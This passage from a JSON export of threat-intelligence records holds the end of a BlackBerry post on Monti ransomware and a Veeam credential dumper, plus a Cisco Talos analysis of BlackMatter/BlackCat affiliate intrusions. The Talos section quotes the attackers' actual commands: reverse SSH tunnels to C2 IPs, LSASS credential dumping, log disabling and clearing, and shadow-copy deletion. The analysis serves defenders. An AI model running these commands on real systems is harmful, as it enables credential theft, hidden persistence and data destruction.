__publickey__ suggested that this file was intended as a template for a ransomware builder to generate functional payloads.\nAlthough the Conti v3 leak did not include the compiled ransomware builder or its source, the Conti v2 leak did include the ransomware builder executable. Analysis of this executable confirmed that it was responsible for replacing the placeholder text mentioned above with actual values.\nThe decompiler excerpt in Figure 8 shows code within the Conti v2 builder that locates the text placeholders and replaces them with a generated RSA public key, RSA private key (for inclusion in the decryptor only) and ransom note text, respectively.\nFigure 8 - Conti v2 builder decompiled code excerpt\nMore Clues in the Timestamps\nAfter determining the origin of the payload file, we explored how the payload we found was likely generated. The attacker could have compiled the leaked v3 source as the first step to produce their payload. However, we suspect they took a different approach, because the compile time of the ransomware payload we found matches the compile time of the leaked Conti v3 locker.exe: Tue Jan 12 19:20:18 2021 UTC.\nIf the source code had been recompiled, this embedded timestamp would be more recent. This timestamp is consistent with others embedded in each executable. It also aligns with the time period when other Conti samples with the same import table hash (imphash - 5036747C069C42A5E12C38D94DB67FAD) were first submitted to VirusTotal. These observations suggest the timestamp was not manually stomped.\nIf the attacker did not recompile the available source code, we considered the possibility that they had access to a Conti v3 builder to generate the payload. Since we do not have access to a Conti v3 builder, we performed testing with the leaked v2 builder.\nWe built multiple payloads across a period of time and found that they all had the same, older compile time of Tue Sep 15 20:17:05 2020 UTC. While this timestamp differed from our sample and the leaked executable, it confirmed the possibility that the Conti v3 builder might also generate payloads with a consistent compile timestamp.\nIt might seem odd for a builder to maintain an old timestamp, but there is precedent for this approach. The Babuk ransomware builder, leaked in June 2021, produces executables with the same compile time, regardless of when the payload is built. In contrast, the Yashma ransomware builder, leaked in May 2022, generates executables that match the time the build was created. (See our earlier blog posts for more information on Yashma and Babuk.)\nIs Monti Made With Manual Modification?\nWhile the discussion thus far might suggest that the Monti attackers used a non-public Conti v3 builder, there is also reason to believe this was not the case. Instead, the attacker might have manually modified (e.g., using a hex editor) the leaked Conti v3 locker.exe executable. To explain this theory, some additional background is required.\nOne difference between Conti v2 and v3 payloads is the format of the embedded ransom note. In Conti v2 payloads, the ransom note text is stored as plaintext in the .data section of the PE file. In Conti v3 executables, the ransom note is encrypted using the ChaCha8 algorithm.\nD.J. Bernstein created this algorithm and threat actors implemented it in both Conti v2 and v3 to encrypt files. In Conti v3, it’s also used to decrypt the instructions for payment.\nComparing the leaked v2 and v3 encryptor source code confirms that only v3 expects the ransom note to be encrypted. In the leaked Conti v2 search.cpp source file (shown in Figure 9 below), although there are several references to the word “Decrypt,” there is no actual decryption performed before the ransom note is written to disk.\nFigure 9 - Conti v2 search.cpp with no ransom note decryption\nIn contrast, the leaked Conti v3 search.cpp source file (shown in Figure 10) includes code to perform ChaCha8 decryption:\nFigure 10 - Conti v2 search.cpp with ransom note decryption\nThe ChaCha8 algorithm uses a 32-byte key and an 8-byte nonce. A nonce, or number used once, is similar to an initialization vector (IV). It is incorporated into the algorithm to add randomness, so that using the same key to encrypt the same content produces different ciphertext (i.e., it helps mitigate replay attacks).\nThe structure of the key, nonce, and encrypted text in a typical Conti v3 payload is shown in Figure 11 below. Only an excerpt of the ciphertext is shown.\nFigure 11 - Typical Conti v3 payload with key and nonce\nCompare the above values with the corresponding bytes in the payload we discovered, shown in Figure 12 below:\nFigure 12 - Our payload with anomalous key and nonce values\nAs you can see, both the key and nonce in this payload are zero-byte values. Just as the Conti v2 builder dynamically generates the 4096-bit public RSA key before embedding it in the payload, we would also expect the ransom note key and nonce values to be generated during the build process.\nThis suggests that the attacker did not have access to the builder and instead manually inserted a ChaCha8 encrypted ransom note, file extension and RSA public key into the leaked Conti v3 locker.exe executable.\nDetecting the Differences\nDue to the absence of a key and nonce, we crafted a signature to find samples that reference “MONTI.” In the payload discovered during this incident, the bytes 20 19 57 65 03 62 D0 AE F4 D1 68 are decrypted to “MONTI strain.”\nSearching for these bytes on VirusTotal resulted in three files with the following SHA-256 hashes:\nb45fe91d2e2340939781d39daf606622e6d0b9ddacd8425cb8e49c56124c1d56\n158dcb26239a5db7a0eb67826178f1eaa0852d9d86e59afb86f04e88096a19bc\n702099b63cb2384e11f088d6bc33afbd43a4c91848f393581242a6a17f1b30a0\nAll files have a VirusTotal imphash (import hash) value that matches the payload we found. All files were also first submitted to VirusTotal in June 2022, the same month as the incident under investigation.\nAmong the samples on VirusTotal with the imphash 5036747C069C42A5E12C38D94DB67FAD, we did find one more sample that did not have a ChaCha8 key or nonce. It was first submitted to VirusTotal on 2022-04-26 20:13:02 UTC. However, the ransom note for this payload did not reference “MONTI” (or any “strain”), so the connection with the Monti actor is unclear.\nVeeam Credential Dumper\nDuring our investigation, we also found malware named veeamp.exe, with SHA-256 hash 9AA1F37517458D635EAE4F9B43CB4770880EA0EE171E7E4AD155BBDEE0CBE732. This file attempts to dump credentials from a SQL database for Veeam backup management software. (The credential dumper is briefly mentioned in this Symantec blog.)\nSome researchers associate this malware with Yanluowang ransomware. It is important to clarify that this credential dumper might have been used by threat actors that also deployed Yanluowang ransomware, but veeamp.exe is not ransomware, and is only capable of dumping Veeam credentials.\nThe file is a 32-bit .NET binary. The code employs control-flow flattening, which is an obfuscation technique that makes it more challenging to understand the flow of execution.\nWhen launched, the malware attempts a connection to a SQL database named VeeamBackup. If it cannot connect to the specified database, no further action is taken. However, if a connection is established, the file runs the following command:\nselect [user_name],[password],[description] FROM [VeeamBackup].[dbo].[Credentials]\nThe program then attempts to decrypt any user passwords that are returned by this command.\nAs discussed in this Veeam documentation, passwords can be encoded and/or encrypted using several approaches, including simple base64 encoding, or through the use of Microsoft’s ProtectedData class.\nThe credential dumper uses these approaches to attempt decryption. If it’s successful, it prints to the screen the following information:\nUsername\nEncrypted password\nDecrypted password\nDescription for each user in the Credentials table\nIt prints this information in the following format:\nuser: {0} encrypted pass: {1} decrypted pass: {2} description: {3}\nThe database name, SQL command, and output format string are all encoded in the executable, using a single-byte XOR key that varies for each string.\nTwo similar Veeam credential dumpers are currently available on VirusTotal (first link, second link). At the time of this writing, both have low detection rates (i.e., 15 detections or less). Both files have similar code to the credential dumper we found, but they are also obfuscated with Eazfuscator.NET.\nConclusion\nWhile the activity of the Monti group itself seems to have been short lived, there is more we can learn from its copycat techniques. As additional Ransomware-as-a-Service (RaaS) solution builders and source code become leaked, either publicly or privately, we could continue to see these doppelganger-like ransomware groups proliferate.\nGeneral familiarity with the TTPs of known groups can help us identify any unique traits of these lookalike crews. The more we can identify these unique traits, the better we will be able to associate known analysis methodologies with these new cases while keeping our eye out for differences.\nYARA Rule\nThe following YARA rules were authored by the BlackBerry Research & Intelligence Team to catch the threats described in this document:\nrule monti_ransom {\n      meta:\n            description = \"Detects ChaCha8 encrypted 'MONTI Strain' text (using all-zero key and nonce) embedded in ransomware payload\"\n            author = \"BlackBerry Threat Research Team\"\n            date = \"August 15, 2021\"\n            license = \"This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team\"\n      strings:\n            $s = {20 19 57 65 03 62 D0 AE F4 D1 68}\n      condition:\n            uint16be(0) == 0x4d5a and filesize < 2MB\n            and $s\n}\nrule veeam_dumper {\n      meta:\n            description = \"Detects Veeam credential Dumper\"\n            author = \"BlackBerry Threat Research Team\"\n            date = \"August 15, 2021\"\n            license = \"This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team\"\n      strings:\n            $s1 = \"SqlCommand\" fullword ascii wide\n            $s2 = \"SqlConnection\" fullword ascii wide\n            $s3 = \"SqlDataReader\" fullword ascii wide\n            $s4 = \"veeamp.exe\" fullword ascii wide\n            $s5 = \"veeamp.pdb\" fullword ascii wide\n      condition:\n            uint16be(0) == 0x4d5a and filesize < 60KB\n            and 4 of them\n}\n  Indicators of Compromise (IoCs)\n\"MONTI” payload SHA-256 hashes:\nb45fe91d2e2340939781d39daf606622e6d0b9ddacd8425cb8e49c56124c1d56\n158dcb26239a5db7a0eb67826178f1eaa0852d9d86e59afb86f04e88096a19bc\n702099b63cb2384e11f088d6bc33afbd43a4c91848f393581242a6a17f1b30a0\nVeeam Credential Dumper SHA-256 hashes:\n9aa1f37517458d635eae4f9b43cb4770880ea0ee171e7e4ad155bbdee0cbe732\ndf492b4cc7f644ad3e795155926d1fc8ece7327c0c5c8ea45561f24f5110ce54\n78517fb07ee5292da627c234b26b555413a459f8d7a9641e4a9fcc1099f06a3d\nReferences\nMalwareHunterTeam. (2022). “Monti strain.” Retrieved from https://twitter.com/malwrhunterteam/status/1542595315915710465?s=20&t=Y7d3POTgnMSB_JcyEeF5_g\nMartire, Ragusa, & Mella. (2022). “Conti Ransomware Source Code: A Well-designed COTS Ransomware.” Retrieved from https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/\nBlackBerry Assistance\nIf you’re battling this malware or a similar threat, you’ve come to the right place, regardless of your existing BlackBerry relationship.\nThe BlackBerry Incident Response team is made up of world-class consultants dedicated to handling response and containment services for a wide range of incidents, including ransomware and Advanced Persistent Threat (APT) cases.\nWe have a global consulting team standing by to assist you, providing around-the-clock support where required, as well as local assistance. Please contact us here: https://www.blackberry.com/us/en/forms/cylance/handraiser/emergency-incident-response-containment\nRelated Reading:\nThreat Thursday: Conti Ransoms Over 400 Organizations Worldwide\nLog4U, Shell4Me: A BlackBerry Guide to the Log4J Vulnerability\nBabuk Ransomware Shifts Attack Methods to Double Extortion\nYashma Ransomware, Tracing the Chaos Family Tree  \nAbout Anuj Soni\nPrincipal Threat Researcher, BlackBerry\nAnuj Soni is a Principal Threat Researcher at BlackBerry, where he performs malware research and reverse engineering. Anuj also brings his problem-solving abilities to his position as a SANS Certified Instructor, which gives him the opportunity to impart his deep technical knowledge and practical skills to students.\nAs a co-author and instructor for Reverse-Engineering Malware and instructor for Advanced Digital Forensics and Incident Response, Anuj emphasizes establishing goals for analysis, creating and following a process, and prioritizing tasks. In addition to teaching SANS courses, Anuj frequently presents at industry events such as the U.S. Cyber Crime Conference, SANS DFIR Summit, and the Computer and Enterprise Investigations Conference (CEIC).\nAnuj holds Bachelor's and Master's degrees from Carnegie Mellon University, and has certifications in GIAC Reverse Engineering Malware (GREM) and as a EnCase Certified Examiner (EnCE) and Certified Information Systems Security Professional (CISSP). \nAbout Ryan Chapman\nRyan Chapman is Principal Incident Response & Forensics Consultant, BlackBerry.\nAs an author, instructor, and information security professional with over 18 years’ experience, Ryan runs and works incidents for clients to provide response, assessment, and training in the digital forensics and incident response (DFIR) realm at BlackBerry. His primary case types involve digital forensics investigations (e.g. ransomware cases), compromise assessments, business email compromises, tabletop exercises, and more. Ryan loves the fact that the security industry is an ever-evolving creature.\nShare on Twitter\nShare on Facebook\nShare on Linked In\nEmail\nFacebook\nTwitter\nYouTube\nInstagram\nCorporate\nDevelopers\nBlogs\nLegal\n© 2023 BlackBerry Limited. All rights reserved.",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-10-09T19:31:34.495Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_on": {
    "$date": "2023-10-09T19:58:39.307Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "65245dbedd4337e9edebd487"
  },
  "name": "BlackCat Ransomware (alphv group)",
  "file_type": null,
  "website_url": "https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/",
  "website_title": "From BlackMatter to BlackCat: Analyzing two attacks from one affiliate",
  "file_name": null,
  "file_size": null,
  "content": "Cisco Talos Intelligence Blog\nFrom BlackMatter to BlackCat: Analyzing two attacks from one affiliate\nBy Tiago Pereira, Caitlin Huey\n\nTHURSDAY, MARCH 17, 2022 07:03\nTHREAT SPOTLIGHT RANSOMWARE\nBlackCat is a recent and growing ransomware-as-a-service (RaaS) group that targeted several organizations worldwide over the past few months.\nThere are rumors of a relationship between BlackCat and the BlackMatter/DarkSide ransomware groups, infamous for attacking the Colonial Pipeline last year. According to a BlackCat representative, BlackCat is not a rebranding of BlackMatter, but its team is made from affiliates of other RaaS groups (including BlackMatter).\nTalos has observed at least one attacker that used BlackMatter was likely one of the early adopters of BlackCat. In this post, we'll describe these attacks and the relationship between them.\nUnderstanding the techniques and tools used by RaaS affiliates helps organizations detect and prevent attacks before the ransomware itself is executed, at which point, every second means lost data.\nDownload the one-pager\nBlackCat ransomware, also known as \"ALPHV,\" has quickly gained notoriety for being used in double ransom (encrypted files and stolen file disclosure) attacks against companies. It first appeared in November 2021 and, since then, several companies have been hit across the globe. However, more than 30 percent of the compromises happened to U.S.-based companies.\nSeveral security companies have noticed a connection between the BlackCat, BlackMatter and DarkSide ransomware groups. Recently, in a Recorded Future interview with a BlackCat representative, the representative confirmed that there was a connection, but no rebranding or other direct relationship.\nThe BlackCat representative explained that the operators are instead affiliates of other RaaS operations and the actors built upon a foundation of their previous knowledge gained as part of other groups. Affiliates in this context are the groups that compromise companies' networks and deploy the ransomware provided by the RaaS operators.\nIf this is true, BlackCat seems to be a case of vertical business expansion. In essence, it's a way to control the upstream supply chain by making a service that is key to their business (the RaaS operator) better suited for their needs and adding another source of revenue.\nVertical expansion is also a common business strategy when there is a lack of trust in the supply chain. There are several cases of vulnerabilities in ransomware encryption, and even of backdoors that can explain a lack of trust in RaaS. One particular case mentioned by the BlackCat representative, was a flaw in DarkSide/BlackMatter ransomware allowing victims to decrypt their files without paying the ransom. Victims used this vulnerability for several months, resulting in big losses for affiliates.\nBlackCat/BlackMatter connection\nWhile researching a BlackCat ransomware attack from December 2021, we observed a domain (and respective IP addresses) used to maintain persistent access to the network. This domain had also been used in a BlackMatter attack in September 2021. Further analysis revealed more commonalities, such as tools, file names and techniques that were common to both ransomware variants.\nAffiliates are responsible for compromising systems and deploying ransomware, so it is likely that attacks carried out by the same ransomware family may differ in techniques and procedures. On the other hand, RaaS operators are known to make training materials and general techniques and tools available to their affiliates, like the leaked Conti ransomware playbook covered by Talos in a previous blog. This may suggest there are some similarities across affiliates.\nOne difference we would expect to see across RaaS affiliates is the command and control (C2) infrastructure used for certain attacks. However, the overlapping C2 address found used in the BlackMatter and BlackCat attacks lead us to assess with moderate confidence that the same affiliate was responsible for both attacks.\nThis connection suggests that a BlackMatter affiliate was likely an early adopter — possibly in the first month of operation — of BlackCat. This is further evidence to support the rumors that there are strong ties between BlackMatter and BlackCat.\nAttack details\nWe analyzed the actions taken by what we believe to be the same affiliate/attackers in the December BlackCat attack and a September BlackMatter attack. In terms of attack flow, the attacks were similar to other human-operated ransomware attacks: initial compromise, followed by an exploration and data exfiltration phase, then attack preparation and finally, the attack execution.\nThe following table summarizes the commonalities and differences in the MITRE ATT&CK® framework between both attacks:\nInitial access\nWe could not identify the initial compromise vector for the BlackCat attack. It is likely that the attack happened on a system not monitored by Cisco Talos telemetry or that a previously compromised account was used to log into an exposed system.\nThere was evidence in the BlackMatter attack that the actor established initial access via the possible exploitation of Microsoft Exchange vulnerabilities. However, we could not directly tie attempts of exploiting vulnerabilities in Microsoft Exchange to the attack and, for this reason, we assess with low confidence that the attack may have started with the exploitation of a vulnerability in Exchange.\nPersistence\nBeyond the access provided by the first exploitation vector, the attackers made sure they had additional remote access to several internal systems.\nDuring the BlackCat attack, the actors used a tool called reverse-ssh, compiled with the C2 server address embedded, to set up reverse SSH tunnels and provide reverse shells to the attacker. Reverse-ssh was deployed to C:\\ directory and named: system, Windows or cache task.\nIt was also observed hidden by writing to an alternate data stream (ADS) of the C:\\ directory using the following command:\nc:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -command  & {(get-content c:\\system -raw | set-content c:\\ -stream 'cachetask')}\nc:\\windows\\system32\\schtasks.exe /create /ru system /sc minute /tn microsoft\\windows\\wininet\\cachetask /tr c:\\:cachetask -b <bind port> /f\nc:\\windows\\system32\\schtasks.exe /run /tn microsoft\\windows\\wininet\\cachetask\nThe “image file execution option” debugger registry key was another way to ensure the malicious file would be persistently executed on the system:\nc:\\windows\\system32\\reg.exe add hklm\\software\\microsoft\\windows nt\\currentversion\\image file execution options\\taskmgr.exe /v debugger /t reg_sz /d c:\\system\nDuring the BlackMatter attack, the group used a similar technique but with a different tool: GO Simple Tunnel (GOST). GOST is a Go-based tunneling tool that was used to establish a reverse SSH tunnel to an attacker-controlled C2 server. This C2 server is the same that was used in the BlackCat attack. The name used for the deployed Gost file was \"system.exe\", similar to the file name used in the BlackCat attack for reverse-ssh.\ncmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\\windows\\temp\\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\\windows\\temp\\system.exe -l rtcp://0.0.0.0:1116/127.0.0.1:3388 -f mwss://52[.]149[.]228[.]45:443 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\\windows\\temp\\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\\windows\\temp\\system.exe -l rtcp://0.0.0.0:1117/127.0.0.1:3388 -f mwss://20[.]46[.]245[.]56:443 /st 12:00 /f\n\nThe same C2 domain was used in both attacks:\nDefense evasion\nDuring the BlackCat attack, logs were disabled on several systems to avoid detection. For example, before setting up the reverse-ssh scheduled task tool attackers disabled logs for the task scheduler (a full list of disabled logs is provided in the IOC section below).\nc:\\windows\\system32\\wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false\n\nThe anti-rootkit tool Gmer was loaded into a small number of key systems. We believe the attackers used this to disable endpoint protection.\nc:\\users\\<username>\\downloads\\gmer\\gmer.exe\nCredential access\nLocal and domain user credentials were collected, on a few key systems, by dumping the LSASS process memory and extracting credentials with Microsoft Sysinternals Procdump and Dumpert:\nc:\\windows\\system\\procdump.exe -accepteula -ma lsass.exe lsass.dmp\nc:\\windows\\system\\dumpert.exe lsass.exe\nDuring the BlackMatter attack, the attacker used comsvcs.dll directly to dump LSASS memory:\npowershell rundll32.exe c:\\windows\\system32\\comsvcs.dll, minidump (get-process lsass).id c:\\temp\\lsass.dmp full\nBeyond the Windows login credentials, during the BlackCat attack, the attackers used a tool named \"steal.exe\" to harvest additional data. We could not obtain the binary, but based on the creation of a results folder with an \"archive.zip\" file inside it, we believe the tool may be HackBrowserData, or a version of it.\nThe following commands were used on a few systems:\ncmd.exe /q /c steal.exe 1> \\\\127.0.0.1\\admin$\\__<num>.<num> 2>&1 cmd.exe /q /c cd results 1> \\\\127.0.0.1\\admin$\\__<num>.<num> 2>&1 cmd.exe /q /c dir 1> \\\\127.0.0.1\\admin$\\__<num>.<num> 2>&1  cmd.exe /q /c del archive.zip 1> \\\\127.0.0.1\\admin$\\__<num>.<num> 2>&1 cmd.exe /q /c del c:\\steal.exe 1> \\\\127.0.0.1\\admin$\\__<num>.<num> 2>&1\nDiscovery\nDuring the BlackCat attack, we observed network scanning and reconnaissance using softperfect network scanner. This tool has many features beyond simple network scanning and was probably a valuable tool in understanding systems roles and network infrastructure and possible lateral movement. The following commands show this tool in use. Notice that the name of the executable has been changed to make it blend into the system's regular processes.\ncmd.exe /c c:\\programdata\\system\\svchost.exe /hide /auto:c:\\programdata\\system\\192.xml /range:192.168.0.0-192.168.255.255 c:\\programdata\\system\\svchost.exe /hide /auto:c:\\programdata\\system\\192.xml /range:192.168.0.0-192.168.255.255 cmd.exe /c c:\\programdata\\system\\svchost.exe /hide /auto:c:\\programdata\\system\\192.xml /range:192.168.0.0-192.168.255.255\nADRecon was also used to collect information from Active Directory and its key servers.\nc:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -exec bypass .\\adrecon.ps1\n\nDuring the BlackMatter attack, the attackers also searched for additional ways to maintain access. For example, the following command shows the attackers exploring an existing TeamViewer installation:\ncmd.exe /q /c teamviewer.exe --getid cmd.exe /q /c dir c:\"program files cmd.exe /q /c dir c:\"program files (x86) 1 cmd.exe /q /c dir c:\"program files (x86)\\teamviewer\\ cmd.exe /q /c c:\"program files (x86)\\teamviewer\\teamviewer.exe --getid\ncmd.exe /q /c c:\"program files (x86)\\teamviewer\\teamviewer.exe -info\n\nThe following commands show the attackers exploring the keepass password manager config:\ncmd.exe /q /c dir c:\"program files (x86)\\\ncmd.exe /q /c dir c:\"program files (x86)\"keepass password safe 2\\\ncmd.exe /q /c type c:\"program files (x86)\"keepass password safe 2\\keepass.exe.config\nLateral movement\nWe observed lateral movement using three main tools and techniques, including Impacket's wmiexec, PowerShell using WinRM service and Microsoft Remote Desktop.\nImpacket's WMIExec provides a shell on remote systems that have the WMI service exposed. We observed its use in both the BlackCat and BlackMatter attacks. This tool's activity can be detected by detecting processes created by wmipsrv.exe that terminate with the following string:\n1> \\\\127.0.0.1\\admin$\\__<timestamp>.<6 digits> 2>&1\n\nThis tool was often used to issue a command to allow WinRM service network connections through the firewall, possibly for the convenience of using some prepared scripts:\ncmd.exe /q /c netsh advfirewall firewall add rule name=service dir=in protocol=tcp localport=5985 action=permit 1> \\\\127.0.0.1\\c$\\windows\\temp\\qaiumg 2>&1\n\nWinRM allows attackers to use PowerShell to execute commands on remote machines. This tool can be detected by searching for processes started by \"wsmprovhost.exe\". Below, there's a few examples of WinRM being used for lateral movement, in this case, to disable logging of many Windows services:\nc:\\windows\\system32\\wevtutil.exe set-log active directory web services /enabled:false\nc:\\windows\\system32\\wevtutil.exe set-log application /enabled:false\nc:\\windows\\system32\\wevtutil.exe set-log hardwareevents /enabled:false\nc:\\windows\\system32\\wevtutil.exe set-log internet explorer /enabled:false\nMicrosoft Remote Desktop was also used by the attackers to obtain GUI access to systems. The following impacket command was issued before the adversary could gain remote admin access.\ncmd.exe /q /c reg add hkey_local_machine\\system\\currentcontrolset\\control\\lsa /v disablerestrictedadmin /t reg_dword /d 0 1> \\\\127.0.0.1\\admin\\$\\__<timestamp>\\.<num> 2>&1\nOther lateral movement techniques observed include PsEexec on both attacks and RemCom — an open-source version of psexec — during the BlackMatter attack.\nCommand and control\nInterestingly, due to what seems to be an OPSEC mistake using the attacker's shell upload and download command, they revealed the use of Kali Linux to execute remote commands.\ncmd.exe /q /c #upload c:\\users\\<user>\\documents\\<doc> /home/kali/desktop/<doc> 1> \\\\127.0.0.1\\admin$\\<num>.<num> 2>&1\ncmd.exe /q /c #download c:\\users\\<user>\\documents\\<doc> /home/kali/desktop/<doc> 1> \\\\127.0.0.1\\admin$\\<num>.<num> 2>&1\nIt is unlikely that the attackers had a Kali Linux installation inside the victim's network, so remote control of the systems was likely achieved through the SSH tunnels described earlier.\nExfiltration\nAlthough we observed a suspiciously large number of documents opened and screenshots taken from one of the compromised systems, we did not identify techniques used to exfiltrate data from the network. It is possible that document exfiltration is carried out by the execution of upload/download commands similar to the ones listed above.\nImpact\nIn both attacks, before the actual execution of the ransomware, the attackers performed several actions preparing systems to make the execution as successful as possible. On the day of the attack, the attacker logged in to the domain controller and opened the group policy management interface. The attackers then dropped and executed a file named \"apply.ps1.\" We believe this script created and prepared the group policy to cause the execution of the ransomware throughout the domain.\nc:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -exec bypass .\\apply.ps1\n\nThis execution results in the immediate writing of group policy files to disk and is followed by the execution of the following command to force the deployment of the group policy:\ncmd.exe /q /c gpupdate /force\n\nA few minutes before BlackCat ransomware started encrypting files, the attackers executed a script called \"defender.vbs\":\ncmd.exe /c \\\\<domaincontroller>\\netlogon\\defender.vbs\n\nIn the BlackMatter attack, the exact same file was named \"def.vbs\" and executed minutes before the encryption began:\ncmd.exe /c \\\\<domaincontroller>\\netlogon\\def.vbs\n\nWe believe this is part of the attack, but at this time do not know the exact role of this script.\nWhen encryption begins, the ransomware file named <num>.exe in the BlackCat attack and, similarly, <num>.exe in the BlackMatter attack, was dropped on the domain servers inside the SYSVOL folder, making it accessible on the NETLOGON network share, accessible by all users in the domain. File encryption makes all systems execute these files from the remote share.\nBlackCat attack:\ncmd.exe -c \\\\<domain controller>\\netlogon\\<num>.exe --access-token <token>\n\nBlackMatter attack:\ncmd.exe -c \\\\<domain controller>\\netlogon\\<num>.exe\n\nThe following variations of the BlackCat command were observed:\n<num>.exe --access-token <token> /f\n<num>.exe --access-token <token> --no-prop-servers \\\\<hostname> --propagated\n<num>.exe -access-token <token> -v -p \\\\<hostname>\\scans\n<num>.exe --access-token <token>\n<num>.exe --child --access-token <token>\n<num>.exe -access-token <token> -v -p .\n\nThe BlackCat executable deployed other commands to make its execution more effective:\nc:\\windows\\system32\\cmd.exe /c fsutil behavior set symlinkevaluation r2l:1\nc:\\windows\\system32\\cmd.exe /c reg add hkey_local_machine\\system\\currentcontrolset\\services\\lanmanserver\\parameters /v maxmpxct /d 65535 /t reg_dword /f c:\\windows\\system32\\cmd.exe /c fsutil behavior set symlinkevaluation r2r:1 c:\\windows\\system32\\cmd.exe /c vssadmin.exe delete shadows /all /quiet c:\\windows\\system32\\cmd.exe /c wmic.exe shadowcopy delete c:\\windows\\system32\\cmd.exe /c arp -a c:\\windows\\system32\\cmd.exe /c bcdedit /set {default} c:\\windows\\system32\\cmd.exe /c cmd.exe /c for /f \"tokens=*\" %1 in ('wevtutil.exe el') do wevtutil.exe cl \"%1\" c:\\windows\\system32\\cmd.exe /c bcdedit /set {default} recoveryenabled no\nConclusion\nBlackCat first surfaced in November 2021, with the attack we described here taking place in December 2021. While we don't know how related BlackCat is to BlackMatter, we assess with moderate confidence that based on the tools and techniques of these attacks and overlapping infrastructure, BlackMatter affiliates were likely among the early adopters of BlackCat.\nAs we have seen several times before, RaaS services come and go. Their affiliates, however, are likely to simply move on to a new service. And with them, many of the TTPs are likely to persist.\nOne key aspect of these attacks is that adversaries take time exploring the environment and preparing it for a successful and broad attack before launching the ransomware, at which point every second means lost data. Therefore, it is key that the attack is detected in its early stages.\nThe two attacks described here took over 15 days to reach the encryption stage. Knowing the attackers tools and techniques and having monitoring and response processes in place could have prevented the successful encryption of the companies files.\nTalos will continue to monitor RaaS and their affiliates activities and provide intelligence, detection rules and indicators to help defenders as they work to protect their networks.\nIOCs\nDOMAINS - COMMON:\nwindows[.]menu\nIP'S - COMMON:\n52.149.228[.]45\n20.46.245[.]56\nHASHES - COMMON:\nApply.ps1\nD97088F9795F278BB6B732D57F42CBD725A6139AFE13E31AE832A5C947099676\ndefender.vbs\nB54DD21019AD75047CE74FE0A0E608F56769933556AED22D25F4F8B01EE0DA15\nHASHES - BLACKCAT:\nReverse-ssh (compiled with hardcoded domain):\n47AFFAED55D85E1EBE29CF6784DA7E9CDBD86020DF8B2E9162A0B1A67F092DCD\nstealer:\n65DBAFE9963CB15CE3406DE50E007408DE7D12C98668DE5DA10386693AA6CD73\nBlackcat ransomware:\n060CA3F63F38B7804420729CDE3FC30D126C2A0FFC0104B8E698F78EDAB96767\nHASHES - BLACKMATTER:\nBlackMatter ransomware:\n706F3EEC328E91FF7F66C8F0A2FB9B556325C153A329A2062DC85879C540839D\nCoverage\nWays our customers can detect and block this threat are listed below.\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\nORBITAL QUERIES\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat.\nSHARE THIS POST\nRELATED CONTENT\nCybercriminals target graphic designers with GPU miners\nSEPTEMBER 7, 2023 08:09\nCybercriminals are abusing Advanced Installer, a legitimate Windows tool used for creating software packages, to drop cryptocurrency-mining malware including PhoenixMiner and lolMiner on infected machines.\nSapphireStealer: Open-source information stealer enables credential and data theft\nAUGUST 31, 2023 08:08\nSapphireStealer appears to be delivered as part of a multi-stage infection process, with threat actors leveraging open-source malware downloaders like FUD-Loader to deliver SapphireStealer to potential victims.\nNew threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware\nAUGUST 7, 2023 08:08\nCisco Talos discovered an unknown threat actor, seemingly of Vietnamese origin, conducting a ransomware operation that began at least as early as June 4, 2023 with customized Yashma ransomware.\nSoftware\nReputation Center\nVulnerability Inforamtion\nMicrosoft Advisory Snort Rules\nIncident Response\nSecure Endpoint Naming Conventions\nTalos File Reputation\nLibrary\nSupport Communities\nAbout\nCareers\nTalos Blog\nThreat Source newsletters\nBeers with Talos Podcast\nTalos Takes Podcast\nCONNECT WITH US\n© 2023 Cisco Systems, Inc. and/or its affiliates. All rights reserved. View our Privacy Policy",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-10-09T20:08:30.086Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6524614edd4337e9edebd489"
  },
  "name": "Rhysida Ransomware",
  "file_type": null,
